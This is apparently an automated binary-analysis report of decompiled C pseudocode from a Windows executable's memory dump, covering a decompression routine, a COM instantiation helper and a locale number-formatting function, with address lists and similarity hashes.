																_t237 = E004094F9(_t443);
																_t347 = 0x10;
																_a4 = _a4 + (_t237 >> _t347 - _v8);
																_t240 =  *(_t443 + 4) + _v8;
																 *_t443 =  *_t443 + (_t240 >> 3);
																_t241 = _t240 & 0x00000007;
																__eflags = _t241;
																 *(_t443 + 4) = _t241;
																_t236 = _a4;
															}
														} else {
															_t236 = _t231 + 2;
														}
														L95:
														_t306[1] = _t236;
														while(1) {
															_t214 =  *_t443;
															__eflags = _t214 - _v12;
															if(_t214 < _v12) {
																goto L15;
															}
															goto L9;
														}
													}
													_t351 = _t441 + 0x2cf8 + _t421 * 4;
													while(1) {
														__eflags = _t227 -  *_t351;
														if(_t227 <  *_t351) {
															break;
														}
														_t421 = _t421 + 1;
														_t351 = _t351 + 4;
														__eflags = _t421 - 0xf;
														if(_t421 < 0xf) {
															continue;
														}
														goto L88;
													}
													_a4 = _t421;
													goto L88;
												}
												_t352 = 0x10;
												_t242 = _t227 >> _t352 - _t420;
												_t355 = ( *(_t242 + _t441 + 0x2d7c) & 0x000000ff) +  *(_t443 + 4);
												 *_t443 =  *_t443 + (_t355 >> 3);
												 *(_t443 + 4) = _t355 & 0x00000007;
												_t231 =  *(_t441 + 0x317c + _t242 * 2) & 0x0000ffff;
												goto L91;
											}
											 *_t306 = 2;
											while(1) {
												_t214 =  *_t443;
												__eflags = _t214 - _v12;
												if(_t214 < _v12) {
													goto L15;
												}
												goto L9;
											}
										}
										_push( &_v48);
										E00413DD1(_v32, _t443);
										_t306[1] = _v48 & 0x000000ff;
										_t306[2] = _v44;
										_t358 = 4;
										 *_t306 = _t358;
										_t427 =  *(_t441 + 0x4ad8);
										_t249 = _t427 * 0xc +  *(_t441 + 0x4ad4);
										 *(_t441 + 0x4ad8) = _t427 + 1;
										 *_t249 = _t358;
										_t249[1] = _v36 & 0x000000ff;
										_t249[2] = _v40;
										while(1) {
											_t214 =  *_t443;
											__eflags = _t214 - _v12;
											if(_t214 < _v12) {
												goto L15;
											}
											goto L9;
										}
									}
									_t250 = _t224 + 0xfffffefa;
									__eflags = _t250 - 8;
									if(_t250 >= 8) {
										_t311 = (_t250 >> 2) - 1;
										_v8 = ((_t250 & 0x00000003 | 0x00000004) << _t311) + 2;
										__eflags = _t311;
										if(_t311 > 0) {
											_t288 = E004094F9(_t443);
											_t398 = 0x10;
											_v8 = _v8 + (_t288 >> _t398 - _t311);
											_t291 =  *(_t443 + 4) + _t311;
											 *_t443 =  *_t443 + (_t291 >> 3);
											_t292 = _t291 & 0x00000007;
											__eflags = _t292;
											 *(_t443 + 4) = _t292;
										}
									} else {
										_v8 = _t250 + 2;
									}
									_v24 = _v8;
									_t257 = E004094F9(_t443);
									_t429 =  *(_t441 + 0xfa0);
									_t258 = _t257 & 0x0000fffe;
									__eflags = _t258 -  *((intOrPtr*)(_t441 + 0xf20 + _t429 * 4));
									if(_t258 >=  *((intOrPtr*)(_t441 + 0xf20 + _t429 * 4))) {
										_t312 = 0xf;
										_t363 = _t429 + 1;
										__eflags = _t363 - _t312;
										if(_t363 >= _t312) {
											L48:
											_t365 =  *(_t443 + 4) + _t312;
											 *(_t443 + 4) = _t365 & 0x00000007;
											 *_t443 =  *_t443 + (_t365 >> 3);
											_t367 = 0x10;
											_t261 = (_t258 -  *((intOrPtr*)(_t441 + 0xf1c + _t312 * 4)) >> _t367 - _t312) +  *((intOrPtr*)(_t441 + 0xf60 + _t312 * 4));
											__eflags = _t261 -  *((intOrPtr*)(_t441 + 0xf1c));
											if(_t261 >=  *((intOrPtr*)(_t441 + 0xf1c))) {
												_t261 = 0;
												__eflags = 0;
											}
											_t262 =  *(_t441 + 0x1ba4 + _t261 * 2) & 0x0000ffff;
											goto L51;
										}
										_t436 = _t441 + 0xf20 + _t363 * 4;
										while(1) {
											__eflags = _t258 -  *_t436;
											if(_t258 <  *_t436) {
												break;
											}
											_t363 = _t363 + 1;
											_t436 = _t436 + 4;
											__eflags = _t363 - 0xf;
											if(_t363 < 0xf) {
												continue;
											}
											goto L48;
										}
										_t312 = _t363;
										goto L48;
									} else {
										_t392 = 0x10;
										_t287 = _t258 >> _t392 - _t429;
										_t395 = ( *(_t287 + _t441 + 0xfa4) & 0x000000ff) +  *(_t443 + 4);
										 *_t443 =  *_t443 + (_t395 >> 3);
										 *(_t443 + 4) = _t395 & 0x00000007;
										_t262 =  *(_t441 + 0x13a4 + _t287 * 2) & 0x0000ffff;
										L51:
										__eflags = _t262 - 4;
										if(_t262 >= 4) {
											_t315 = (_t262 >> 1) - 1;
											_a4 = ((_t262 & 0x00000001 | 0x00000002) << _t315) + 1;
											__eflags = _t315;
											if(_t315 <= 0) {
												L70:
												_t432 = _a4;
												__eflags = _t432 - 0x100;
												if(_t432 <= 0x100) {
													_t370 = _v24;
												} else {
													_t370 = _v8 + 1;
													__eflags = _t432 - 0x2000;
													if(_t432 > 0x2000) {
														_t370 = _t370 + 1;
														__eflags = _t432 - 0x40000;
														if(_t432 > 0x40000) {
															_t370 = _t370 + 1;
														}
													}
												}
												_t267 = _v28;
												 *_t267 = 1;
												_t267[1] = _t370;
												_t267[2] = _t432;
												while(1) {
													_t214 =  *_t443;
													__eflags = _t214 - _v12;
													if(_t214 < _v12) {
														goto L15;
													}
													goto L9;
												}
											}
											__eflags = _t315 - 4;
											if(__eflags < 0) {
												_t268 = E0041262C(_t443);
												_t373 = 0x20;
												_a4 = _a4 + (_t268 >> _t373 - _t315);
												_t271 =  *(_t443 + 4) + _t315;
												 *_t443 =  *_t443 + (_t271 >> 3);
												_t272 = _t271 & 0x00000007;
												__eflags = _t272;
												 *(_t443 + 4) = _t272;
												goto L70;
											}
											if(__eflags > 0) {
												_t280 = E0041262C(_t443);
												_t390 = 0x24;
												_a4 = _a4 + (_t280 >> _t390 - _t315 << 4);
												_t118 = _t315 - 4; // 0xb
												_t320 =  *(_t443 + 4) + _t118;
												 *_t443 =  *_t443 + (_t320 >> 3);
												_t321 = _t320 & 0x00000007;
												__eflags = _t321;
												 *(_t443 + 4) = _t321;
											}
											_t273 = E004094F9(_t443);
											_t316 =  *(_t441 + 0x1e8c);
											_t274 = _t273 & 0x0000fffe;
											__eflags = _t274 -  *((intOrPtr*)(_t441 + 0x1e0c + _t316 * 4));
											if(_t274 >=  *((intOrPtr*)(_t441 + 0x1e0c + _t316 * 4))) {
												_t433 = 0xf;
												_t378 = _t316 + 1;
												__eflags = _t378 - _t433;
												if(_t378 >= _t433) {
													L65:
													_t380 =  *(_t443 + 4) + _t433;
													 *(_t443 + 4) = _t380 & 0x00000007;
													 *_t443 =  *_t443 + (_t380 >> 3);
													_t382 = 0x10;
													_t277 = (_t274 -  *((intOrPtr*)(_t441 + 0x1e08 + _t433 * 4)) >> _t382 - _t433) +  *((intOrPtr*)(_t441 + 0x1e4c + _t433 * 4));
													__eflags = _t277 -  *((intOrPtr*)(_t441 + 0x1e08));
													if(_t277 >=  *((intOrPtr*)(_t441 + 0x1e08))) {
														_t277 = 0;
														__eflags = 0;
													}
													_t278 =  *(_t441 + 0x2a90 + _t277 * 2) & 0x0000ffff;
													goto L68;
												}
												_t319 = _t441 + 0x1e0c + _t378 * 4;
												while(1) {
													__eflags = _t274 -  *_t319;
													if(_t274 <  *_t319) {
														break;
													}
													_t378 = _t378 + 1;
													_t319 = _t319 + 4;
													__eflags = _t378 - 0xf;
													if(_t378 < 0xf) {
														continue;
													}
													goto L65;
												}
												_t433 = _t378;
												goto L65;
											} else {
												_t384 = 0x10;
												_t279 = _t274 >> _t384 - _t316;
												_t387 = ( *(_t279 + _t441 + 0x1e90) & 0x000000ff) +  *(_t443 + 4);
												 *_t443 =  *_t443 + (_t387 >> 3);
												 *(_t443 + 4) = _t387 & 0x00000007;
												_t278 =  *(_t441 + 0x2290 + _t279 * 2) & 0x0000ffff;
												L68:
												_a4 = _a4 + _t278;
												goto L70;
											}
										}
										_a4 = _t262 + 1;
										goto L70;
									}
								}
								__eflags =  *(_t441 + 0x4ad8) - 1;
								if( *(_t441 + 0x4ad8) <= 1) {
									L34:
									 *_t306 =  *_t306 & 0x00000000;
									_t306[2] = _t224;
									_t236 = 0;
									goto L95;
								}
								__eflags =  *(_t306 - 0xc);
								if( *(_t306 - 0xc) != 0) {
									goto L34;
								}
								_t402 =  *(_t306 - 8) & 0x0000ffff;
								__eflags = _t402 - 3;
								if(_t402 >= 3) {
									goto L34;
								}
								_t403 = _t402 + 1;
								 *(_t306 - 8) = _t403;
								 *((_t403 & 0x0000ffff) + _t306 - 4) = _t224;
								 *(_t441 + 0x4ad8) =  *(_t441 + 0x4ad8) - 1;
								continue;
							}
						}
					} else {
						 *((char*)(_t441 + 0x4ad0)) = 1;
						L98:
						return _t214;
					}
				} else {
					 *((char*)(_t441 + 0x2c)) = 1;
					_t302 = E0041416C(__ebx, __ecx, _t441 + 4, _t441 + 0x18, _t441 + 0x30);
					if(_t302 != 0) {
						goto L3;
					} else {
						 *((char*)(_t441 + 0x4ad0)) = 1;
						return _t302;
					}
				}
			}

0x00414487
0x0041448e
0x00414495
0x00414498
0x004144bf
0x004144bf
0x004144c6
0x004144cb
0x004144cd
0x004144de
0x004144e5
0x004144ef
0x004144f2
0x004144f4
0x004144f7
0x004144fa
0x004144fd
0x004144ff
0x004144ff
0x00414502
0x00414503
0x00414503
0x00414505
0x00414508
0x00000000
0x00000000
0x0041450a
0x0041450a
0x0041450d
0x00414a44
0x00000000
0x00414a44
0x00414513
0x00414521
0x00414521
0x00414524
0x00414533
0x00414533
0x00414539
0x00414a3d
0x00414a3d
0x00000000
0x00414a3d
0x00000000
0x00414539
0x00414526
0x0041452d
0x00000000
0x00000000
0x00000000
0x0041452d
0x00414518
0x0041451b
0x00000000
0x00000000
0x00000000
0x0041453f
0x0041453f
0x00414545
0x0041454a
0x00414550
0x00414552
0x00414554
0x00414559
0x0041455a
0x00414560
0x00414562
0x00414569
0x0041456b
0x0041456d
0x00414574
0x00414574
0x0041456d
0x00414579
0x00414584
0x0041458d
0x00414590
0x00414596
0x0041459b
0x004145a1
0x004145a6
0x004145aa
0x004145d5
0x004145d6
0x004145dd
0x004145e0
0x004145f8
0x004145fb
0x00414605
0x00414607
0x0041460d
0x00414614
0x00414619
0x0041461d
0x00414620
0x00414622
0x00414622
0x00414622
0x00414624
0x00000000
0x00414624
0x004145e2
0x004145e6
0x004145e6
0x004145e8
0x00000000
0x00000000
0x004145ea
0x004145eb
0x004145ee
0x004145f1
0x00000000
0x00000000
0x00000000
0x004145f3
0x004145f5
0x00000000
0x004145ac
0x004145ae
0x004145b1
0x004145bb
0x004145c3
0x004145c8
0x004145cb
0x0041462c
0x00414631
0x00414633
0x00414672
0x00414677
0x004148ce
0x004148d0
0x00414921
0x00414926
0x0041493a
0x00414940
0x00414943
0x00414948
0x0041494e
0x00414953
0x0041495a
0x00414985
0x00414986
0x0041498d
0x00414990
0x004149ab
0x004149ae
0x004149b8
0x004149ba
0x004149c0
0x004149ca
0x004149cf
0x004149d6
0x004149dc
0x004149de
0x004149de
0x004149de
0x004149e0
0x004149e8
0x004149e8
0x004149eb
0x004149fa
0x00414a00
0x00414a04
0x00414a05
0x00414a08
0x00414a0a
0x00414a0e
0x00414a15
0x00414a1b
0x00414a21
0x00414a29
0x00414a2b
0x00414a2b
0x00414a2e
0x00414a31
0x00414a31
0x004149ed
0x004149ed
0x004149ed
0x00414a34
0x00414a34
0x00414503
0x00414503
0x00414505
0x00414508
0x00000000
0x00000000
0x00000000
0x00414508
0x00414503
0x00414992
0x00414999
0x00414999
0x0041499b
0x00000000
0x00000000
0x0041499d
0x0041499e
0x004149a1
0x004149a4
0x00000000
0x00000000
0x00000000
0x004149a6
0x004149a8
0x00000000
0x004149a8
0x0041495e
0x00414961
0x0041496b
0x00414973
0x00414978
0x0041497b
0x00000000
0x0041497b
0x00414928
0x00414503
0x00414503
0x00414505
0x00414508
0x00000000
0x00000000
0x00000000
0x00414508
0x00414503
0x004148d8
0x004148da
0x004148e4
0x004148eb
0x004148f0
0x004148f1
0x004148f3
0x004148fe
0x00414905
0x0041490b
0x00414912
0x00414919
0x00414503
0x00414503
0x00414505
0x00414508
0x00000000
0x00000000
0x00000000
0x00414508
0x00414503
0x0041467d
0x00414682
0x00414685
0x00414697
0x004146a1
0x004146a4
0x004146a6
0x004146aa
0x004146b1
0x004146b6
0x004146bc
0x004146c3
0x004146c5
0x004146c5
0x004146c8
0x004146c8
0x00414687
0x0041468a
0x0041468a
0x004146d0
0x004146d3
0x004146d8
0x004146de
0x004146e3
0x004146ea
0x00414717
0x00414718
0x0041471b
0x0041471d
0x00414737
0x0041473a
0x00414741
0x00414747
0x00414752
0x00414757
0x0041475e
0x00414764
0x00414766
0x00414766
0x00414766
0x00414768
0x00000000
0x00414768
0x0041471f
0x00414726
0x00414726
0x00414728
0x00000000
0x00000000
0x0041472a
0x0041472b
0x0041472e
0x00414731
0x00000000
0x00000000
0x00000000
0x00414733
0x00414735
0x00000000
0x004146ec
0x004146ee
0x004146f1
0x004146fb
0x00414703
0x00414708
0x0041470b
0x00414770
0x00414770
0x00414773
0x00414785
0x0041478e
0x00414791
0x00414793
0x00414893
0x00414893
0x00414896
0x0041489c
0x004148b6
0x0041489e
0x004148a1
0x004148a2
0x004148a8
0x004148aa
0x004148ab
0x004148b1
0x004148b3
0x004148b3
0x004148b1
0x004148a8
0x004148b9
0x004148bc
0x004148c2
0x004148c6
0x00414503
0x00414503
0x00414505
0x00414508
0x00000000
0x00000000
0x00000000
0x00414508
0x00414503
0x00414799
0x0041479c
0x00414872
0x00414879
0x0041487e
0x00414884
0x0041488b
0x0041488d
0x0041488d
0x00414890
0x00000000
0x00414890
0x004147a2
0x004147a6
0x004147ad
0x004147b5
0x004147bb
0x004147bb
0x004147c4
0x004147c6
0x004147c6
0x004147c9
0x004147c9
0x004147ce
0x004147d3
0x004147d9
0x004147de
0x004147e5
0x00414812
0x00414813
0x00414816
0x00414818
0x00414832
0x00414835
0x0041483c
0x00414842
0x0041484d
0x00414852
0x00414859
0x0041485f
0x00414861
0x00414861
0x00414861
0x00414863
0x00000000
0x00414863
0x0041481a
0x00414821
0x00414821
0x00414823
0x00000000
0x00000000
0x00414825
0x00414826
0x00414829
0x0041482c
0x00000000
0x00000000
0x00000000
0x0041482e
0x00414830
0x00000000
0x004147e7
0x004147e9
0x004147ec
0x004147f6
0x004147fe
0x00414803
0x00414806
0x0041486b
0x0041486b
0x00000000
0x0041486b
0x004147e5
0x00414776
0x00000000
0x00414776
0x004146ea
0x00414635
0x0041463c
0x00414665
0x00414665
0x00414668
0x0041466b
0x00000000
0x0041466b
0x0041463e
0x00414642
0x00000000
0x00000000
0x00414644
0x00414648
0x0041464c
0x00000000
0x00000000
0x0041464e
0x0041464f
0x00414656
0x0041465a
0x00000000
0x0041465a
0x004145aa
0x004144cf
0x004144cf
0x00414a45
0x00000000
0x00414a45
0x0041449a
0x004144a6
0x004144aa
0x004144b1
0x00000000
0x004144b3
0x004144b3
0x00000000
0x004144b3
0x004144b1

APIs

_realloc.LIBCMT ref: 00414562

Strings

l*C, xrefs: 0041456F

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: _realloc
String ID: l*C
API String ID: 1750794848-1043478356
Opcode ID: 96362d48d6f27f157a0ffd0ddb7b153c5033b00447e0e85479a127ad4406f4c9
Instruction ID: 5fabe494e630971bee18146e4ca30216bd99ba044a7a496cd74106c872b31a81
Opcode Fuzzy Hash: 96362d48d6f27f157a0ffd0ddb7b153c5033b00447e0e85479a127ad4406f4c9
Instruction Fuzzy Hash: B102E5B1A00606ABCB1CDF28C5916E9B7E1FF85304F24852FD556CBA85D338E8D1CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00418A76, Relevance: 3.1, APIs: 2, Instructions: 59
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418A76(void* __ecx, void* _a4) {
				void* _v8;
				char _v24;
				char* _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;
				intOrPtr* _t20;
				intOrPtr* _t23;
				intOrPtr* _t25;
				intOrPtr* _t36;
				intOrPtr* _t37;

				__imp__CLSIDFromString(_a4,  &_v24);
				_t36 = __ecx + 0x18;
				_t16 =  &_v24;
				__imp__CoCreateInstance(_t16, 0, 5, 0x42b118, _t36);
				if( *_t36 != 0) {
					_t17 =  *_t36;
					_t16 =  *((intOrPtr*)( *_t17))(_t17, 0x42b0d8,  &_a4);
					if(_t16 >= 0) {
						_t18 = _a4;
						 *((intOrPtr*)( *_t18 + 0xc))(_t18, __ecx);
						_t20 = _a4;
						 *((intOrPtr*)( *_t20 + 8))(_t20);
						_t37 =  *_t36;
						_t16 =  *((intOrPtr*)( *_t37))(_t37, 0x42b0b8,  &_v8);
						if(_t16 >= 0) {
							_t23 = _v8;
							 *((intOrPtr*)( *_t23 + 0x20))(_t23);
							_t25 = _v8;
							return  *((intOrPtr*)( *_t25 + 8))(_t25);
						}
					}
				}
				return _t16;
			}

0x00418a87
0x00418a8d
0x00418a9a
0x00418a9e
0x00418aa7
0x00418aa9
0x00418ab7
0x00418abb
0x00418abd
0x00418ac4
0x00418ac7
0x00418acd
0x00418ad0
0x00418ade
0x00418ae2
0x00418ae4
0x00418aea
0x00418aed
0x00000000
0x00418af3
0x00418ae2
0x00418abb
0x00418af9

APIs

CLSIDFromString.OLE32(?,?), ref: 00418A87
CoCreateInstance.OLE32(?,00000000,00000005,0042B118,?), ref: 00418A9E

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFromInstanceString
String ID:
API String ID: 432265043-0
Opcode ID: fb1317749d365c53c76bd26193ef5ab227521c73f323c60124046c705833e4a7
Instruction ID: 831e8b701154176bad5e3c490811f309a6382ef4a7d7aa2b073da3062f5ee59b
Opcode Fuzzy Hash: fb1317749d365c53c76bd26193ef5ab227521c73f323c60124046c705833e4a7
Instruction Fuzzy Hash: 26118F75600204EFCB10DFA4C848E9B77BCEF89355B204459F941EB251DB75ED41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040CDD7, Relevance: 3.0, APIs: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CDD7(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				int _t22;
				void* _t23;
				void* _t24;
				short* _t26;

				if( *0x42f0d4 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0x44c3dc = _v304;
					 *0x44c3de = 0;
					 *0x42f0d4 = 0x44c3dc;
				}
				E004107EB(_t23, _t24, _a4, _a8,  &_v104);
				_t22 = _a16;
				_t26 = _a12;
				 *_t26 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0x42f0c4, _t26, _t22);
				 *((short*)(_t26 + _t22 * 2 - 2)) = 0;
				return 0;
			}

0x0040cdef
0x0040cdfd
0x0040ce0a
0x0040ce12
0x0040ce18
0x0040ce18
0x0040ce2c
0x0040ce31
0x0040ce34
0x0040ce40
0x0040ce4a
0x0040ce53
0x0040ce5b

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0040CDFD
GetNumberFormatW.KERNEL32 ref: 0040CE4A

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 74c33d292984edd6fb0b71c8307b0a1313e9e4ee1c45f5661db44396f4e84846
Instruction ID: 86ac2fd9e89ff4a23dc6afe29d1b527439c64e8686f0a1002956f3f4e9f2710a
Opcode Fuzzy Hash: 74c33d292984edd6fb0b71c8307b0a1313e9e4ee1c45f5661db44396f4e84846
Instruction Fuzzy Hash: 67015E39200208AAD721CF60ED81BAA77B8EF09710F404036FA04D71A0E3B459558B69

Uniqueness

Uniqueness Score: -1.00%

Function 00413A24, Relevance: 1.8, APIs: 1, Instructions: 267
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00413A24(void* __ecx, unsigned int __edx) {
				signed int _v8;
				signed int _v12;
				char _v32;
				char _v60;
				char _v77;
				char _v137;
				char _v436;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t113;
				char _t119;
				signed int _t124;
				unsigned int _t125;
				signed int _t128;
				signed int _t129;
				signed int _t132;
				intOrPtr _t149;
				signed int _t155;
				signed int _t157;
				signed int _t158;
				signed int _t161;
				signed int _t162;
				void* _t172;
				void* _t173;
				signed int _t185;
				void* _t187;
				intOrPtr* _t189;
				signed int _t198;
				intOrPtr* _t200;
				void* _t201;
				signed int _t204;
				signed int _t210;
				signed int _t211;
				signed int _t219;
				signed int _t221;
				intOrPtr* _t222;
				intOrPtr* _t224;
				void* _t225;
				void* _t226;

				_t209 = __edx;
				_t173 = __ecx;
				_t224 = __ecx + 4;
				if( *_t224 <=  *((intOrPtr*)(__ecx + 0x78)) - 0x19) {
					L2:
					E00409527(_t224,  ~( *(_t173 + 8)) & 0x00000007);
					_t113 = E0040953E(_t224);
					_t230 = _t113 & 0x00008000;
					if((_t113 & 0x00008000) == 0) {
						 *((intOrPtr*)(_t173 + 0xe670)) = 0;
						 *((intOrPtr*)(_t173 + 0x98c8)) = 0;
						 *((intOrPtr*)(_t173 + 0x98cc)) = 0;
						__eflags = _t113 & 0x00004000;
						if((_t113 & 0x00004000) == 0) {
							E0041A110(0, _t173 + 0xe4c0, 0, 0x1ae);
							_t226 = _t226 + 0xc;
						}
						E00409527(_t224, 2);
						_v8 = 0;
						do {
							_v12 = E0040953E(_t224) >> 0x0000000c & 0x000000ff;
							E00409527(_t224, 4);
							_t119 = _v12;
							__eflags = _t119 - 0xf;
							if(_t119 != 0xf) {
								 *((char*)(_t225 + _v8 - 0x1c)) = _t119;
								goto L16;
							}
							_t219 = E0040953E(_t224) >> 0x0000000c & 0x000000ff;
							E00409527(_t224, 4);
							__eflags = _t219;
							if(_t219 != 0) {
								_t221 = _t219 + 2;
								while(1) {
									__eflags = _t221;
									if(_t221 <= 0) {
										break;
									}
									_t221 = _t221 - 1;
									__eflags = _v8 - 0x14;
									if(_v8 >= 0x14) {
										break;
									}
									_t23 =  &_v8;
									 *_t23 = _v8 + 1;
									__eflags =  *_t23;
									 *((char*)(_t225 + _v8 - 0x1c)) = 0;
								}
								_v8 = _v8 - 1;
								goto L16;
							}
							 *((char*)(_t225 + _v8 - 0x1c)) = 0xf;
							L16:
							_v8 = _v8 + 1;
							__eflags = _v8 - 0x14;
						} while (__eflags < 0);
						_t222 = _t173 + 0x3c44;
						E0041237D(__eflags,  &_v32, _t222, 0x14);
						_t37 =  &_v8;
						 *_t37 = _v8 & 0x00000000;
						__eflags =  *_t37;
						do {
							__eflags =  *_t224 -  *((intOrPtr*)(_t173 + 0x78)) - 5;
							if( *_t224 <=  *((intOrPtr*)(_t173 + 0x78)) - 5) {
								L20:
								_t124 = E004094F9(_t224);
								_t210 =  *(_t222 + 0x84);
								_t125 = _t124 & 0x0000fffe;
								__eflags = _t125 -  *((intOrPtr*)(_t222 + 4 + _t210 * 4));
								if(_t125 >=  *((intOrPtr*)(_t222 + 4 + _t210 * 4))) {
									_t211 = _t210 + 1;
									_v12 = 0xf;
									__eflags = _t211 - 0xf;
									if(_t211 >= 0xf) {
										L28:
										_t185 =  *(_t224 + 4) + _v12;
										 *_t224 =  *_t224 + (_t185 >> 3);
										_t209 = _v12;
										 *(_t224 + 4) = _t185 & 0x00000007;
										_t187 = 0x10;
										_t128 = (_t125 -  *((intOrPtr*)(_t222 + _v12 * 4)) >> _t187 - _v12) +  *((intOrPtr*)(_t222 + 0x44 + _t209 * 4));
										__eflags = _t128 -  *_t222;
										if(_t128 >=  *_t222) {
											_t128 = 0;
											__eflags = 0;
										}
										_t129 =  *(_t222 + 0xc88 + _t128 * 2) & 0x0000ffff;
										L31:
										__eflags = _t129 - 0x10;
										if(_t129 >= 0x10) {
											__eflags = _t129 - 0x12;
											_t189 = _t224;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t132 = (E0040953E(_t189) >> 9) + 0xb;
													__eflags = _t132;
													_push(7);
												} else {
													_t132 = (E0040953E(_t189) >> 0xd) + 3;
													_push(3);
												}
												_v12 = _t132;
												E00409527(_t224);
												while(1) {
													__eflags = _v12;
													if(_v12 <= 0) {
														goto L50;
													}
													_v12 = _v12 - 1;
													__eflags = _v8 - 0x194;
													if(_v8 >= 0x194) {
														goto L51;
													}
													_t90 =  &_v8;
													 *_t90 = _v8 + 1;
													__eflags =  *_t90;
													 *((char*)(_t225 + _v8 - 0x1b0)) = 0;
												}
												goto L50;
											}
											__eflags = _t129 - 0x10;
											if(_t129 != 0x10) {
												_t155 = (E0040953E(_t189) >> 9) + 0xb;
												__eflags = _t155;
												_push(7);
											} else {
												_t155 = (E0040953E(_t189) >> 0xd) + 3;
												_push(3);
											}
											_v12 = _t155;
											E00409527(_t224);
											__eflags = _v8;
											if(_v8 > 0) {
												while(1) {
													__eflags = _v12;
													if(_v12 <= 0) {
														break;
													}
													_t157 = _v8;
													_v12 = _v12 - 1;
													__eflags = _t157 - 0x194;
													if(_t157 >= 0x194) {
														goto L51;
													}
													 *((char*)(_t225 + _t157 - 0x1b0)) =  *((intOrPtr*)(_t225 + _t157 - 0x1b1));
													_t158 = _t157 + 1;
													__eflags = _t158;
													_v8 = _t158;
												}
											}
											goto L50;
										}
										_t198 = _v8;
										_t209 =  *((intOrPtr*)(_t198 + _t173 + 0xe4c0)) + _t129 & 0x0000000f;
										 *(_t225 + _t198 - 0x1b0) =  *((intOrPtr*)(_t198 + _t173 + 0xe4c0)) + _t129 & 0x0000000f;
										_v8 = _t198 + 1;
										goto L50;
									}
									_t200 = _t222 + 4 + _t211 * 4;
									while(1) {
										__eflags = _t125 -  *_t200;
										if(_t125 <  *_t200) {
											break;
										}
										_t211 = _t211 + 1;
										_t200 = _t200 + 4;
										__eflags = _t211 - 0xf;
										if(_t211 < 0xf) {
											continue;
										}
										goto L28;
									}
									_v12 = _t211;
									goto L28;
								}
								_t201 = 0x10;
								_t161 = _t125 >> _t201 - _t210;
								_t204 = ( *(_t161 + _t222 + 0x88) & 0x000000ff) +  *(_t224 + 4);
								_t209 = _t204 >> 3;
								 *_t224 =  *_t224 + (_t204 >> 3);
								 *(_t224 + 4) = _t204 & 0x00000007;
								_t129 =  *(_t222 + 0x488 + _t161 * 2) & 0x0000ffff;
								goto L31;
							}
							_t162 = E00411E9F(_t173, _t173, _t209);
							__eflags = _t162;
							if(_t162 == 0) {
								L52:
								_t149 = 0;
								L54:
								return _t149;
							}
							goto L20;
							L50:
							__eflags = _v8 - 0x194;
						} while (_v8 < 0x194);
						L51:
						__eflags =  *_t224 -  *((intOrPtr*)(_t173 + 0x78));
						 *((char*)(_t173 + 0xe674)) = 1;
						if(__eflags <= 0) {
							E0041237D(__eflags,  &_v436, _t173 + 0x94, 0x12b);
							E0041237D(__eflags,  &_v137, _t173 + 0xf80, 0x3c);
							E0041237D(__eflags,  &_v77, _t173 + 0x1e6c, 0x11);
							E0041237D(__eflags,  &_v60, _t173 + 0x2d58, 0x1c);
							_t174 = _t173 + 0xe4c0;
							__eflags = _t173 + 0xe4c0;
							E0041BB80(_t173 + 0xe4c0, _t222, _t224, _t174,  &_v436, 0x1ae);
							_t149 = 1;
							goto L54;
						}
						goto L52;
					}
					 *((intOrPtr*)(_t173 + 0xe670)) = 1;
					return E004135C7(_t173 + 0x98d0, _t209, _t230, _t173, _t173 + 0xe4bc);
				}
				_t172 = E00411E9F(__ecx, __ecx, __edx);
				if(_t172 != 0) {
					goto L2;
				}
				return _t172;
			}

0x00413a24
0x00413a2e
0x00413a34
0x00413a3c
0x00413a4b
0x00413a56
0x00413a5d
0x00413a62
0x00413a67
0x00413a8e
0x00413a94
0x00413a9a
0x00413aa0
0x00413aa5
0x00413ab4
0x00413ab9
0x00413ab9
0x00413ac0
0x00413ac5
0x00413ac8
0x00413ad9
0x00413adc
0x00413ae1
0x00413ae4
0x00413ae7
0x00413b2f
0x00000000
0x00413b2f
0x00413af7
0x00413afa
0x00413aff
0x00413b01
0x00413b0e
0x00413b23
0x00413b23
0x00413b25
0x00000000
0x00000000
0x00413b11
0x00413b12
0x00413b16
0x00000000
0x00000000
0x00413b1b
0x00413b1b
0x00413b1b
0x00413b1e
0x00413b1e
0x00413b27
0x00000000
0x00413b27
0x00413b06
